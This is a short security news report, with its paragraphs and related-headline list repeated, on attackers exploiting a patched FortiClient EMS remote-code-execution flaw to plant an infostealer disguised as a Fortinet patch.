Critical FortiClient EMS Vulnerability Exploited in Fresh Attacks

A critical FortiClient Endpoint Management Server (EMS) vulnerability patched in April has been exploited in fresh attacks to deploy information-stealing malware, Arctic Wolf reports.

The flaw, tracked as CVE-2026-35616 (CVSS score of 9.1), can be exploited remotely via crafted requests for remote code execution (RCE) and does not require authentication.

Fortinet rolled out hotfixes for the security defect in early April, warning that it had been exploited in the wild as a zero-day and urging immediate patching.

Unpatched FortiClient EMS deployments are now being targeted in a campaign deploying the EKZ Infostealer disguised as a fake Fortinet endpoint patch.

The payload was executed via FortiClient-managed VPN scripting workflows, using command scripts that invoked PowerShell, suggesting knowledge of the affected environment.

A critical FortiClient Endpoint Management Server (EMS) vulnerability patched in April has been exploited in fresh attacks to deploy information-stealing malware, Arctic Wolf reports.

The flaw, tracked as CVE-2026-35616 (CVSS score of 9.1), can be exploited remotely via crafted requests for remote code execution (RCE) and does not require authentication.

Fortinet rolled out hotfixes for the security defect in early April, warning that it had been exploited in the wild as a zero-day and urging immediate patching.

Unpatched FortiClient EMS deployments are now being targeted in a campaign deploying the EKZ Infostealer disguised as a fake Fortinet endpoint patch.

The payload was executed via FortiClient-managed VPN scripting workflows, using command scripts that invoked PowerShell, suggesting knowledge of the affected environment.

Critical FortiClient EMS Vulnerability Exploited in Fresh Attacks

Critical FortiClient EMS Vulnerability Exploited in Fresh Attacks

Other newsrooms on this story

Related reading

Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer

Hackers exploit FortiClient EMS flaw to push infostealer malware

PAN-OS RCE Exploit Under Active Use Enabling Root Access and Espionage

Microsoft Warns of Two Actively Exploited Defender Vulnerabilities

Palo Alto PAN-OS Flaw Under Active Exploitation Enables Remote Code Execution

Cisco warns of new critical SD-WAN flaw exploited in zero-day attacks

Other newsrooms on this story

Related reading

Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer

Hackers exploit FortiClient EMS flaw to push infostealer malware

PAN-OS RCE Exploit Under Active Use Enabling Root Access and Espionage

Microsoft Warns of Two Actively Exploited Defender Vulnerabilities

Palo Alto PAN-OS Flaw Under Active Exploitation Enables Remote Code Execution

Cisco warns of new critical SD-WAN flaw exploited in zero-day attacks